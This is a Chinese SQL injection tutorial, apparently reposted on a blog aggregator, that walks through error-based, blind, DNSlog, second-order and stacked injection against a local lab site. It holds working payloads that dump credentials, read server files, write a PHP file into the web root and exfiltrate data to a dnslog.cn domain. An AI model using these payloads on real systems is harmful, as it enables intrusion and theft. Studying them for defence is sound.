网络安全之SQL注入漏洞复现(中篇)(技术进阶)

目录

一,报错注入

二,布尔盲注

三,sleep延时盲注

四,DNSlogs 盲注

五,二次注入

六,堆叠注入

 总结


一,报错注入

报错注入就是在错误信息中执行 sql 语句,利用网站的报错信息来带出我们想要的信息。

1,group by 重复键冲突

原理:是通过rand产生随机数据导致group by分组时的主键冲突。

【1】就是利用 count()、rand()、floor()、 group by 这几个特定的函数结合在一起产生的注入漏洞

count(*):计算总共有多少条数据

rand():产生大于等于0小于1的随机数

floor():向下取整函数例如floor(1.6),结果为1,取比1.6小的整数

group by:将查询结果分组

sql注入代码:

?id=1 and (select 1 from (select count(*),concat(0x5e,(select version() from
information_schema.tables limit 0,1) ,0x5e,floor(rand(0)*2)) a 
from information_schema.tables group by a)cname)

 代码解读:

1,(select version() from information_schema.tables limit 0,1)

从 information_schema这个特殊数据库中的tables中获取数据库版本信息,limit 0,1:只返回一行数据。

2,concat(0x5e,语句,0x5e)

concat 连接字符串,ox5e为16进制的^,所以连接的结果就是:^语句返回的结果^

3,floor(rand(0)*2)

 rand(0)产生大于等于0小于1的固定随机数,乘以2又floor向下取整之后得到的只有0或1,它出现的目的就是令group by的主键冲突。

那么如何冲突的呢?

冲突过程:

获得的值插入的值产生的临时表
0判断是0,表中没有所以插入1v1表:1
1
1判断是1(说明v1表中有这个键),所以不插入1+1=2
0判断是0,认为表中没有,插入1

与v1键冲突了

(因为插入了2个1)
1

4,select count(*), ... a from information_schema.tables group by a

其实这里的count(*)是统计information_schema.tables的行数,但是这里并没有用上只是用来保证格式正确,group by a是通过别名a的结果进行分组,也就是:concat(0x5e,(select version() from
information_schema.tables limit 0,1) ,0x5e,floor(rand(0)*2))它的结果。

5,select 1 from ...cname

最外边的这个用于返回一个1,同时返回内部语句报错带出的结果,cname是别名哈

【2】rand(14)好还是rand(0)好

当然是rand(14)好,来看看吧

group by 冲突

随机值插入值临时表
1判断为1 ,插入0v0
0
1判断为1,插入0有(v0)了又插入一个v0所以发生了冲突
0

综上所述:rand(14)比rand(0)少判断一次,所以它好哈哈

2,xpath 报错

原理:是通过extractvalue()函数使用错误的格式来产生报错并且带出需要的信息

sql注入代码

id=1 and extractvalue(1, concat(0x5c, (select version()),0x5c))

结果: 

代码解释:

【1】extractvalue()是mysql中用于从XML文档中提取数值的函数。

【2】基本格式:extractvalue(xml文档,查询数据的位置)

例如:

SELECT extractvalue('<root><name>狗蛋</name><age>19</age></root>', '//name')

 结果:

3,updatexml 报错

原理:通过用错误的updatexm()格式来使他报错并返回信息

sql注入代码:

id=1 and updatexml(1,concat(0x5e,(select version()),0x5e),1)

 结果:

【1】updatexml 是 mysql中的一个 XML 函数,它用于修改 XML 文档中的值。

【2】updatexml(xml文档,要替换的数据,替换成的数据)

例如:

SELECT updatexml('<root><username>狗蛋</username><age>18</age></root>',
'//username','<name>狗哥</name>')

结果:

4,实战

【1】找注入点

【2】获取数据库名

sql注入代码:

'or (select 1 from (select count(*),concat(0x5e,(select database() from information_schema.tables limit 0,1) ,0x5e,floor(rand(0)*2))x from information_schema.tables group by x)a) or'

' or extractvalue(1, concat(0x5c, (select database() from information_schema.tables limit 0,1),0x5c)) or ' 

结果:

【3】获得数据库中的表

sql注入代码:

' or extractvalue(1, concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema='jrlt'),0x5c)) or ' 

结果:

 

【4】获取表中的字段名

sql注入代码:

' or updatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='jrlt'),0x5e),1) or ' 

结果:

 

【5】获取字段中的数据

sql注入代码:

' or updatexml(1,concat(0x5e,(select concat(name,':',password) from users limit 0,1),0x5e),1) or ’

结果:

 

值得注意的是:

21232f297a57a5a743894a0e4a801fc3//数据库中的数据

21232f297a57a5a743894a0e4//获得的数据

可以看到它少了一截,这是因为updatexml一次只截取32位超过的部分就不管了,所以我们可以使用下面的代码分2次去获取。

 sql注入代码1:

' or updatexml(1,concat(0x5e,(select
concat(name,':',substring(password,1,16)) from users limit
0,1),0x5e),1) or '

sql注入代码2:

 ' or updatexml(1,concat(0x5e,(select
concat(name,':',substring(password,17)) from users limit
0,1),0x5e),1) or '

 分别得到:
21232f297a57a5a7//第一次获得的数据
43894a0e4a801fc3//第二次

21232f297a57a5a743894a0e4a801fc3//拼接

 拼在一起去解码就好了。

二,布尔盲注

union和报错注入搞不定的情况下可以用这个,盲注(就是猜)

【1】判断是否存在布尔注入

sql注入代码:

and 1=1

and 1=2

结果:

假:

真:

 【2】获取数据库名字

sql注入代码:

and length(database())>0

and length(database())<5

and length(database())=4

 盲注就是一直去猜,猜对为止

 知道数据库长度后,就可以通过ascii码值判断数据库的名字是由哪些字符组成的。

ascii码表:

 sql注入代码:

and ascii(substr(database(),1,1))<ascii码值

就这样一直试一直排除直到条件正确为止

 

 四个字符都试出来后为jrlt

验证数据库名字是否正确:

and database()='jrlt'

 

【3】获取数据库中有几个表

sql注入代码:

and (select count(table_name) from information_schema.tables where table_schema = database())=1

 

(猜的过程就跳过了)结果:

 

【5】表名的长度

sql注入代码:

and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))<10

(猜的过程就跳过了)结果:

【4】获取表名

sql注入代码:

and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<10

 

过程就跳过了,结果为,messages,users

substr(str, pos, len)

  • str 是要从中提取子字符串的原始字符串。
  • pos 是开始提取的位置(基于 1 的索引)。
  • len 是要提取的字符数。

例如:

select substr('Hello World', 1, 5);

 【5】获取表中的字段长度

sql注入代码:

and length((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1))<10

这里跳过过程,结果: 

长度分别是:2,4,8,5,5

【6】获取字段名字

sql注入代码:

and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1))<100

 过程跳过,结果:id,name,password,photo,money

 【7】获取内容的长度

sql注入代码:

and (select LENGTH(name) from users LIMIT 0,1)=5

 过程跳过了,结果:

 【8】获得字段内容

sql注入代码:

and ascii(substr((select name from users limit 0,1),1,1))=97

 猜的过程跳过(获取其他的字段也是如此操作),结果:admin

三,sleep延时盲注

延时注入就是通过判断sleep语句是否执行来推测if语句是否为真

这个方法效率超低,在union,报错,布尔注入都搞不定的情况下用这个

【1】测试是否有延时注入

sql注入代码:

and sleep(5)

【2】猜数据库名

1,sql注入代码:

and  if(length(database()<10),sleep(5),1)

and  if(length(database()=4),sleep(5),1)

2,这里直接跳过猜的过程了,看结果吧

【3】猜数据库名由那些字符组成

sql注入代码:

and if(ascii(substr(database(),1,1)=106),sleep(5),1)

 

过程就跳过了,结果是jrlt

【4】获取数据库中有多少个表

sql注入代码:

and if((select count(*) from information_schema.tables where table_schema='jrlt')=3,sleep(5),1)

【5】获取数据库中表的字符

sql注入代码:

 and if(ascii(substr((select table_name from information_schema.tables where table_schema='jrlt' limit 0,1),1,1)=109),sleep(5),1)

 

原理都一样这里就不做演示了:messages,users,user三个表 

【6】获取表users表中有多少个字段

sql注入代码:

and if((select count(*) from information_schema.columns where table_name='users' and table_schema='jrlt')=5,sleep(5),1)

这里过程跳过原理都一样

 

【7】猜测字段名长度

sql注入代码:

 and if((select length((select column_name from information_schema.columns where table_name='users' and table_schema='jrlt' limit 0,1)))=2,sleep(5),1) 

【8】猜测字段名字符

sql注入代码:

and if(ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 0,1),0,1))=105,sleep(5),1)

 

 过程跳过结果id............

【9】猜id的内容

sql注入代码:

and if(ascii(substr((select id from users limit 0,1),1,1))=51,sleep(5),1)

得到是3

四,DNSlogs 盲注

它是利用DNS域名服务器上的域名信息进行sql盲注的,在数据库中DNSlogs可以使用load_file()函数来加载本地文件和url请求。但是前提是要有root权限并且secure_file_priv参数要为空

1,查看配置

show VARIABLES like 'secure_file_priv'

secure_file_priv参数配置含义
secure_file_priv=null不允许mysqld导入和导出
secure_file_priv=‘/temp/’只能在temp目录下进行导入导出
secure_file_priv=不限制导入和导出操作

2,修改配置

\phpStudy\PHPTutorial\MySQL\my.ini

3,获取数据库data所在目录

4,获取网站所在目录

熟悉phpstudy的应该知道网站目录放在vhosts.conf配置文件里面

使用load_file读取文件内容

sql注入代码:

?id=-1  union select 1,2,3,load_file('E:\\phpStudy\\PHPTutorial\\Apache\\conf\\vhosts.conf')

 5,得到目录后对其写入文件

sql注入代码:

union select 1,2,3,'<?php phpinfo();?>' into outfile
"E:\\phpStudy\\PHPTutorial\\WWW\\bbs\\test.php"
 

 

获取网站目录的方法:

1,通过一句话木马

2,通过配置文件

3,通过报错注入带出网站目录

实战

DNSLog Platform

1,获取数据库名

sql注入代码:

and load_file(concat('//',(select database()),'.us9ybc.dnslog.cn/123'))

2,获取表名

sql注入代码:

and load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.us9ybc.dnslog.cn/123'))

 

 道理都一样自己去玩吧!

五,二次注入

二次注入就是在数据库中已有的用户被再次以特殊的方式添加,然后执行sql语句进行攻击的操作。

实战

1,碰撞用户

 2,用特殊的方法注册用户

 3,修改密码

看到这读者们想必也猜出来了

admin'#这里'的作用是闭合语句,#在数据库sql语句中是注释符号,对比一下

正常语句:

 update users set password=123456 where name='admin';

攻击者的语句:

update users set password=123123 where name='admin'#';

 哈哈,有意思吧!

六,堆叠注入

堆叠注入就是多条语句通过;号分隔一同执行的语句,从而达到攻击效果

例如:

 先获得对方数据库名

上篇讲过了,这里直接给代码了,忘记了就去看看我的sql注入上篇吧

?id=-2 union select 1,database(),2,3  //获取数据库名

?id=-2 union select 1,(select group_concat(table_name ) from information_schema.tables where table_schema='jrlt'),2,3 //获取数据库中的表名

?id=-2 union select 1,(select group_concat(column_name ) from information_schema.columns where table_schema='jrlt' and table_name='users'),2,3 //获取字段名

得到基本信息后进行添加操作 

?id=2; insert into users(name,password) values('dd',123456)

 

为啥会登录失败呢?

sql注入代码:

?id=2; insert into users(name,password) values('gd',md5(123456))

 

 

 总结

在我们手工注入时,我们应当根据实际情况判断用那种注入,以及要知道每一种注入方法的原理,

手工注入固然慢,但是这才是灵魂所在,使用sqlmap工具虽然高效但是没有灵魂嘞

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/569289.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

2024-04-23 linux 查看内存占用情况的命令free -h和cat /proc/meminfo

一、要查看 Linux 系统中的内存占用大小&#xff0c;可以使用 free 命令或者 top 命令。下面是这两个命令的简要说明&#xff1a; 使用 free 命令&#xff1a; free -h这将显示系统当前的内存使用情况&#xff0c;包括总内存、已用内存、空闲内存以及缓冲区和缓存的使用情况。…

使用 Flutter 打造引人入胜的休闲游戏体验

作者 / Zoey Fan 去年&#xff0c;Flutter 休闲游戏工具包进行了一次重大更新。近期在旧金山举办的游戏开发者大会 (GDC) 上&#xff0c;Flutter 首次亮相。GDC 是游戏行业的顶级专业盛会&#xff0c;致力于帮助游戏开发者不断提升开发技能。欢迎您继续阅读&#xff0c;了解开发…

小程序AI智能名片商城系统如何依赖CPM、CPC、CPS技术应用进行营销

在数字化营销的新纪元中&#xff0c;小程序AI智能名片商城系统以其高效、智能的特性&#xff0c;成为了企业营销的重要工具。而CPM、CPC、CPS这三种技术应用&#xff0c;更是为该系统赋予了强大的营销能力。接下来&#xff0c;我们将通过详细的例子&#xff0c;探讨这些技术是如…

微信小程序webview和小程序通讯

1.背景介绍 1.1需要在小程序嵌入vr页面&#xff0c;同时在vr页面添加操作按钮与小程序进行通信交互 1.2 开发工具&#xff1a;uniapp开发小程序 1.3原型图 功能&#xff1a;.点击体验官带看跳转小程序的体验官带看页面 功能&#xff1a;点击立即咨询唤起小程序弹窗打电话 2.…

力扣数据库题库学习(4.23日)

610. 判断三角形 问题链接 解题思路 题目要求&#xff1a;对每三个线段报告它们是否可以形成一个三角形。以 任意顺序 返回结果表。 对于三个线段能否组成三角形的判定&#xff1a;任意两边之和大于第三边&#xff0c;对于这个表内的记录&#xff0c;要求就是&#xff08;x…

【C语言】指针篇-一篇搞定不同类型指针变量-必读指南(3/5)

男儿不展风云志&#xff0c;空负天生八尺躯。——《警世通言卷四十》&#x1f308;个人主页&#xff1a;是店小二呀 &#x1f308;C语言笔记专栏&#xff1a;C语言笔记 &#x1f308;C笔记专栏&#xff1a; C笔记 &#x1f308;喜欢的诗句:无人扶我青云志 我自踏雪至山巅 上篇…

vue项目启动npm install和npm run serve时出现错误Failed to resolve loader:node-sass

1.常见问题 问题1&#xff1a;当执行npm run serve时&#xff0c;出现Failed to resolve loader: node-sass&#xff0c;You may need to install it 解决方法&#xff1a; npm install node-sass4.14.1问题2&#xff1a;当执行npm run serve时&#xff0c;出现以下错误 Fa…

ADC内部运行原理

1以一个简单的外置ADC为例讲解 1在外部由地址锁存和译码经行去控制通道选择开关//去控制外部那一条IO口输入&#xff0c;输入到比较器 2逐次逼近寄存器SAR每次从三态锁存缓冲器读取值在由DAC&#xff08;数模转换成模拟电压&#xff09;在输入到比较器当io信号和DAC信号几乎一样…

JWT原理解析

一、概述 虽然现在很多的开发框架会支持JWT的使用&#xff0c;但是对JWT还是没有一个详细的了解&#xff0c;有很多疑惑&#xff1a; JWT比之前的session或者token有什么好处&#xff1f;JWT的构成元素是什么&#xff1f;JWT从生成到使用的详细流程&#xff1f; 二、 JWT 2…

华为数通方向HCIP-DataCom H12-821题库(多选题:321-340)

第321题 关于OSPF的命令描述,不正确的是: A、stub区域和totally stub区域配置了no-summary参数 B、OSPFv2和OSPF v3配置接口命令的区别是OSPF V2可以使用network命令,而OSPFv3直接 C、在接口上使能stubrouter命令用来配置次路由器为stub路由器,stub路由器可以与非stub路由 …

AUTOSAR-COMStack-003_SignalGroup如何发送接收

1. Ref Ref.1 AUTOSAR_RS_Main.pdf Ref.1 AUTOSAR_RS_Features.pdf Ref.2 AUTOSAR_SRS_COM.pdf Ref.3 AUTOSAR_SWS_COM.pdf 2. 为什么要使用Signal Group&#xff1f; 2.1 Traceabilty [RS_PO_00004] AUTOSAR shall define an open architecture for automotive software.…

debian和ubuntu的核心系统和系统命令的区别

Debian和Ubuntu虽然有很深的渊源&#xff0c;都是基于Debian的发行版&#xff0c;但它们在核心系统和系统命令上还是有一些差别的。以下是一些主要的不同之处&#xff1a; 1. 发布周期&#xff1a; - Debian&#xff1a; Debian项目采用滚动发布模型&#xff0c;持续更新&a…

【数据结构(邓俊辉)学习笔记】向量03——无序向量

文章目录 0.概述1.元素访问2.置乱器3.判等器与比较器4.无序查找4.1 判等器4.2 顺序查找4.3 实现4.4 复杂度 5. 插入5.1 算法实现5.2 复杂度分析 6. 删除6.1 区间删除6.2 单元删除6.3 复杂度 7. 唯一化7.1 实现7.2 正确性7.3 复杂度 8. 遍历8.1 实现8.2 复杂度 9. 总结 0.概述 …

vue3引入图片 无法使用require, vue3+vite构建项目使用require引入包出现问题需要用newURL来动态引入图片等静态资源

在vue3中 require引入图片的本地资源报错Uncaught (in promise) ReferenceError: require is not defined <template> <img :src"imageSrc" alt"My Image"> </template> <script> import imageSrc from /assets/image.png; export…

多媒体技术如何为地震体验馆增添更多真实元素?

近年来&#xff0c;为提升公众安全意识&#xff0c;众多体验式科普展馆纷纷崭露头角&#xff0c;其中地震体验馆尤为引人瞩目&#xff0c;成为学校安全教育的热门场景&#xff0c;接下来&#xff0c;我们就深入探索一下&#xff0c;这种运用了多媒体技术的地震体验馆&#xff0…

有哪些好用的电商API接口(京东|天猫|淘宝商品详情数据接口)

此API目前支持以下基本接口&#xff1a; 如何获取此API测试权限&#xff1f; item_get 获得淘宝商品详情item_get_pro 获得淘宝商品详情高级版item_review 获得淘宝商品评论item_fee 获得淘宝商品快递费用item_password 获得淘口令真实urlitem_list_updown 批量获得淘宝商品上…

云计算中的过度授权:安全隐患与应对策略

云计算凭借其弹性、可扩展等优势&#xff0c;已经成为诸多企业组织拓展业务的重要基础设施之一。然而&#xff0c;与传统IT架构相比&#xff0c;云计算环境的安全管理也面临着新的挑战。过度授权 (Overprivileging) 便是云安全领域亟待解决的主要问题之一&#xff0c;本文将带领…

开源模型应用落地-LangChain高阶-知识图谱助力记忆增强

一、前言 通过langchain框架调用本地模型&#xff0c;使得用户可以直接提出问题或发送指令&#xff0c;而无需担心具体的步骤或流程。langchain会自动将任务分解为多个子任务&#xff0c;并将它们传递给适合的语言模型进行处理。 本篇通过使用 ConversationKGMemory 组件&#…

MySQL简解

文章目录 1. MySQL框架2. 执行流程2.1. 连接池&#xff1a;2.2. SQL 前端(SEVER)2.2.0. 查询缓存2.2.1. SQL 接口2.2.2. SQL 解析器2.2.3. SQL 执行器2.2.4. INNODB 中读写操作 2.3. 数据的保存形式 3.其他重要概念3.1. 索引3.1.1. 简单概念3.1.2. 索引优化&#xff1a;1. Usin…

【复现代码——环境配置】

目录 一、复现代码举例二、创建环境——选择一个Python版本2.1 创建基本环境2.1.1 基于AutoDL2.1.2 基于PyCharm 2.2 终端激活环境2.3 退出环境2.4 删除环境 三、PyTorch安装3.1 查看cuda3.2 安装PyTorch 四、其他依赖安装4.1 tensorboardX4.2 matplotlib4.3 medpy4.4 visdom4.…